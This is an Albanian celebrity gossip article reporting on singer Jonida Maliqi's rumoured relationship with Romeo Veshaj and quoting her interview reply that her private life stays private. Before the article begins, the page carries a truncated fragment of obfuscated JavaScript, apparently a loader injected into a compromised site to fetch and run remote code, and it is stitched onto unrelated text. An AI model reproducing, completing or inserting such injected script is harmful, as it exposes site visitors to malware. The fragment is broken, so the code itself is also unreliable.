;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

U kap mat me të dashurin e ri, Jonida Maliqi ka një përgjigje për këtë!

By

Tashmë nuk ka dyshime për romancën e Romeo Veshajt me Jonida Maliqin.

Pas disa muajsh të aludimeve dhe hipotezave që qarkullonin në portale, dyshja më nuk po fshihen, përkundër faktit që njëkohësisht as nuk po shfaqen tërësisht publikisht.

Megjithatë, janë postimet nga vende të njëjta ato që linin të kuptohet mjaftueshëm mbi raportin e pandarë të dyshes.

Madje, dyshimet u hoqën plotësisht pasi MCN Radio Albania, siguroi një video të çiftit në momente intime romantike në pishinë.

Ndërsa tani, vjen edhe përgjigja e parë e Jonidës për jetën personale. Në intervistën e fundit për Revistën shqiptare “Class” ajo u pyet: Ç’koment ke për titujt rozë të kohëve të fundit, ka një “Romeo” në jetën tënde?

“Jeta ime personale dua të mbetet e tillë, ndaj mund të shprehem se jam e qetë dhe e lumtur momentalisht”, ka qenë përgjigja e Maliqit kundrejt kësaj pyetjeje.

Duket se lidhja e nisur nga fundi i verës së vitit të kaluar po shkon si më së miri, në prag të përvjetorit të parë!

Artikuj të ngjashëm